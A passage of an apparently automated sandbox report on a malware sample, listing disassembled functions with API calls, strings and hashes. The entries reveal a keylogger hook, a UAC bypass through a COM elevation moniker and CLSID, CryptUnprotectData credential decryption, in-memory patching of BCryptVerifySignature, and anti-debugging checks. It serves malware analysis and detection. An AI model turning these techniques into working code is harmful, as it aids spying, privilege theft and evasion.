                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,03237338,03230000,0325B790), ref: 032359DD
                                                                                                                                                                                    • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,03237338,03230000,0325B790), ref: 032359EF
                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,03237338,03230000,0325B790), ref: 032359FB
                                                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,03237338,03230000), ref: 03235A2F
                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,03237338), ref: 03235A3B
                                                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 03235A5D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                                                                    • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                                                                    • API String ID: 3245196872-1565342463
                                                                                                                                                                                    • Opcode ID: e6bdb68efcb43aa327428b318a3c5955d8c69c353e8eb756918527a34a207fa1
                                                                                                                                                                                    • Instruction ID: 6bbaca881b7583aab9af4af92a7179558f570bfb1f329924825a30c3fb66ae4a
                                                                                                                                                                                    • Opcode Fuzzy Hash: e6bdb68efcb43aa327428b318a3c5955d8c69c353e8eb756918527a34a207fa1
                                                                                                                                                                                    • Instruction Fuzzy Hash: A14154B2D10619AFDB10EAE8CC88ADEB7FCAF0B250F1845A5A549D7240D7B4DF808B54
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CA74FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 15CA7521
                                                                                                                                                                                    • CoGetObject.OLE32(?,00000024,15D06518,00000000), ref: 15CA7582
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Object_wcslen
                                                                                                                                                                                    • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                                                                                    • API String ID: 240030777-3166923314
                                                                                                                                                                                    • Opcode ID: 11a60d62343ac931aab4da1b898874b747fdc06c6ea5741139f1ca805cca3259
                                                                                                                                                                                    • Instruction ID: 1e3fa12d925dc0396cc55d90185b97b33d847ed7091030d6951c4b1959be85b3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 11a60d62343ac931aab4da1b898874b747fdc06c6ea5741139f1ca805cca3259
                                                                                                                                                                                    • Instruction Fuzzy Hash: C5113377910219AADB10DED48C489DEBBFCFB04710F140556E509A7240FA34AA45C7F1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03235B9C Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03235BAC
                                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 03235BB9
                                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 03235BBF
                                                                                                                                                                                    • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 03235BEA
                                                                                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 03235C31
                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 03235C41
                                                                                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 03235C69
                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 03235C79
                                                                                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 03235C9F
                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 03235CAF
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                    • API String ID: 1599918012-2375825460
                                                                                                                                                                                    • Opcode ID: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
                                                                                                                                                                                    • Instruction ID: bfc0e86dddbe20d26e615fb8dcf627c0569d31b57df5e88e3b19aca86861d3c8
                                                                                                                                                                                    • Opcode Fuzzy Hash: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5631A7F1E5022D2AFF25D6B4DC45FDEB7AD4B06384F0405E19648E7185D6B4AEC88B90
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CBC291 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,15D14EE0,?), ref: 15CBC2EC
                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,15D14EE0,?), ref: 15CBC31C
                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,15D14EE0,?), ref: 15CBC38E
                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,15D14EE0,?), ref: 15CBC39B
                                                                                                                                                                                      • Part of subcall function 15CBC291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,15D14EE0,?), ref: 15CBC371
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,15D14EE0,?), ref: 15CBC3BC
                                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,15D14EE0,?), ref: 15CBC3D2
                                                                                                                                                                                    • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,15D14EE0,?), ref: 15CBC3D9
                                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,15D14EE0,?), ref: 15CBC3E2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2341273852-0
                                                                                                                                                                                    • Opcode ID: 5bd1892f5c3054d7829bd4d098cb7dbb95dbb5cc12f56c21c1b8cf845f142e1e
                                                                                                                                                                                    • Instruction ID: d9e73235e8114bfa58b44482306f347dbc64c6cf8c27aaf6ec47c5dd67652310
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5bd1892f5c3054d7829bd4d098cb7dbb95dbb5cc12f56c21c1b8cf845f142e1e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5131527690422E5ADB10DEA0CC98EDFB77CBF45244F800AE6E655D2041EF71A6C8CBA1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CAA2B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 15CAA2D3
                                                                                                                                                                                    • SetWindowsHookExA.USER32(0000000D,15CAA2A4,00000000), ref: 15CAA2E1
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 15CAA2ED
                                                                                                                                                                                      • Part of subcall function 15CBB4EF: GetLocalTime.KERNEL32(00000000), ref: 15CBB509
                                                                                                                                                                                    • GetMessageA.USER32 ref: 15CAA33B
                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 15CAA34A
                                                                                                                                                                                    • DispatchMessageA.USER32 ref: 15CAA355
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Keylogger initialization failure: error , xrefs: 15CAA301
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                                                                                    • String ID: Keylogger initialization failure: error
                                                                                                                                                                                    • API String ID: 3219506041-952744263
                                                                                                                                                                                    • Opcode ID: a8824c2911020c9208ca5fcf8fab210019eac3e12a18c090c9b6ec687b2ef299
                                                                                                                                                                                    • Instruction ID: d333b26ca5850965522291b29c27977e886d2ce3856cad71cd4c0eabc18e07a3
                                                                                                                                                                                    • Opcode Fuzzy Hash: a8824c2911020c9208ca5fcf8fab210019eac3e12a18c090c9b6ec687b2ef299
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0211C4336142526BCB106FB9CC4889B7BFCEA81A15B40596EF886C2140FF70E504CBA2
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CE9190 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _free.LIBCMT ref: 15CE9212
                                                                                                                                                                                    • _free.LIBCMT ref: 15CE9236
                                                                                                                                                                                    • _free.LIBCMT ref: 15CE93BD
                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,15CFF234), ref: 15CE93CF
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,15D12764,000000FF,00000000,0000003F,00000000,?,?), ref: 15CE9447
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,15D127B8,000000FF,?,0000003F,00000000,?), ref: 15CE9474
                                                                                                                                                                                    • _free.LIBCMT ref: 15CE9589
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 314583886-0
                                                                                                                                                                                    • Opcode ID: 9fdcce17e6cf3e6cfaed0f7962123a4a32a32ebb6211dfbdd4d8b05b7cb63a6d
                                                                                                                                                                                    • Instruction ID: d98ba785b2126be128856fbd7264ed29dd23c797a6751cdfc85e1d0b22df9142
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9fdcce17e6cf3e6cfaed0f7962123a4a32a32ebb6211dfbdd4d8b05b7cb63a6d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7DC12776E04355ABDB11CF79C880AEEBFB9FF45210F14099AD89597280EB35AE42CB50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03247AC0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40librarynativeloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryW.KERNEL32(bcrypt,ScanString,03295360,03249A30,Initialize,03295360,03249A30,UacScan,03295360,03249A30,UacInitialize,03295360,03249A30,ScanString,03295360,03249A30), ref: 03247AD2
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature,bcrypt,ScanString,03295360,03249A30,Initialize,03295360,03249A30,UacScan,03295360,03249A30,UacInitialize,03295360,03249A30,ScanString), ref: 03247ADF
                                                                                                                                                                                    • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,ScanString,03295360,03249A30,Initialize,03295360,03249A30,UacScan,03295360), ref: 03247AF6
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,ScanString,03295360,03249A30,Initialize,03295360,03249A30,UacScan,03295360,03249A30,UacInitialize,03295360,03249A30), ref: 03247B05
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                                                                                    • String ID: BCryptVerifySignature$bcrypt
                                                                                                                                                                                    • API String ID: 1002360270-4067648912
                                                                                                                                                                                    • Opcode ID: d2a3008a50399d88397a102e4969a90be7e333f7e414e1e715cc2db803d12723
                                                                                                                                                                                    • Instruction ID: fd964304142c1fba584ed23fdcc5d5399decbdcf6e3ad5db5ff8a691cc46f346
                                                                                                                                                                                    • Opcode Fuzzy Hash: d2a3008a50399d88397a102e4969a90be7e333f7e414e1e715cc2db803d12723
                                                                                                                                                                                    • Instruction Fuzzy Hash: E9F0E9755153553ED121E1685C80EBF629CDBC37A0F04463DF5749A180D7A18884C7F1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CF4159 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __floor_pentium4
                                                                                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                                                                                                    • Opcode ID: 0c11151764c6c1096354e12b350621ca1e5a112aa22111f3184f4bbbf87a4324
                                                                                                                                                                                    • Instruction ID: 1cc6806f182770a243c2026f1802477e5f0b262f6065c0f1252f4947d9a21864
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c11151764c6c1096354e12b350621ca1e5a112aa22111f3184f4bbbf87a4324
                                                                                                                                                                                    • Instruction Fuzzy Hash: 41C24972E086298FDB65CE28DD807D9B7B5FB44305F1149EBD54EE7240E774AA818F40
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CB1CFE Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 15CB179C: SetLastError.KERNEL32(0000000D,15CB1D1C,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,15CB1CFA), ref: 15CB17A2
                                                                                                                                                                                    • SetLastError.KERNEL32(000000C1,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,15CB1CFA), ref: 15CB1D37
                                                                                                                                                                                    • GetNativeSystemInfo.KERNEL32(?), ref: 15CB1DA5
                                                                                                                                                                                    • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,00000000), ref: 15CB1DC9
                                                                                                                                                                                      • Part of subcall function 15CB1CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,15CB1DE7,?,00000000,00003000,00000040,00000000,?,00000000), ref: 15CB1CB3
                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,00000000), ref: 15CB1E10
                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000), ref: 15CB1E17
                                                                                                                                                                                    • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 15CB1F2A
                                                                                                                                                                                      • Part of subcall function 15CB2077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,15CB1F37,?,?,?,?,00000000), ref: 15CB20E7
                                                                                                                                                                                      • Part of subcall function 15CB2077: HeapFree.KERNEL32(00000000), ref: 15CB20EE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3950776272-0
                                                                                                                                                                                    • Opcode ID: 25413ae554e05def20f30209145aeb2614d220bb31ccf721a9c5c665e299cda9
                                                                                                                                                                                    • Instruction ID: c59ac55f490e3e331b05d2e791e77838f4475dc060622d613420a85fe0fa0a28
                                                                                                                                                                                    • Opcode Fuzzy Hash: 25413ae554e05def20f30209145aeb2614d220bb31ccf721a9c5c665e299cda9
                                                                                                                                                                                    • Instruction Fuzzy Hash: EB61F175B04651ABC7019F66C980B6B7BAAFFC47C0F404959E9068B285EBF8E841CBD1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CA880C Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 15CA8811
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,15D06608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 15CA88CA
                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 15CA88F2
                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 15CA88FF
                                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 15CA8A15
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1771804793-0
                                                                                                                                                                                    • Opcode ID: 035b1e2ea2793861060c84799d76900eacecdd329da051dcd958bb397ce9f280
                                                                                                                                                                                    • Instruction ID: b2b3584a3a2897b19c9041d0f6ce0cafc9f8bb7e318d920a375c0e3024042c9f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 035b1e2ea2793861060c84799d76900eacecdd329da051dcd958bb397ce9f280
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D51717BA0025AABCF04EF64DD959EE7F79AF50240F504959E806A3190FF34BB48CB91
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CA6A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(crypt32), ref: 15CA6A82
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 15CA6A89
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                    • String ID: CryptUnprotectData$crypt32
                                                                                                                                                                                    • API String ID: 2574300362-2380590389
                                                                                                                                                                                    • Opcode ID: 78d743f6190ecce7cb98092f2a1f1b5c1739e3c074d9ef6cf606429192e3c6a2
                                                                                                                                                                                    • Instruction ID: e463765842ae4f5570e2fa4ef151b12e35a804449489d98b7349abfda252cc20
                                                                                                                                                                                    • Opcode Fuzzy Hash: 78d743f6190ecce7cb98092f2a1f1b5c1739e3c074d9ef6cf606429192e3c6a2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0801B577E04217ABCB08CFADC8949AEBFB8EF84200F14856EE955D3200EB319944C7A0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CBB4EF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLocalTime.KERNEL32(00000000), ref: 15CBB509
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LocalTime
                                                                                                                                                                                    • String ID: | $%02i:%02i:%02i:%03i
                                                                                                                                                                                    • API String ID: 481472006-2430845779
                                                                                                                                                                                    • Opcode ID: f46ae084f6e4ba25ed86d3eddf9a12859d6dbabd9801e86db3580cb3b8bfe8c1
                                                                                                                                                                                    • Instruction ID: cdb0b09168cf581025ae762744e52fdadd27d3d2547172a9515dff7c07cf8a82
                                                                                                                                                                                    • Opcode Fuzzy Hash: f46ae084f6e4ba25ed86d3eddf9a12859d6dbabd9801e86db3580cb3b8bfe8c1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C118E7B6282565AC704DF65DC408FFBBE8AF84244F500E1AF496821D0FF24FA49C762
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CDBB22 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 15CDBC1A
                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32 ref: 15CDBC24
                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 15CDBC31
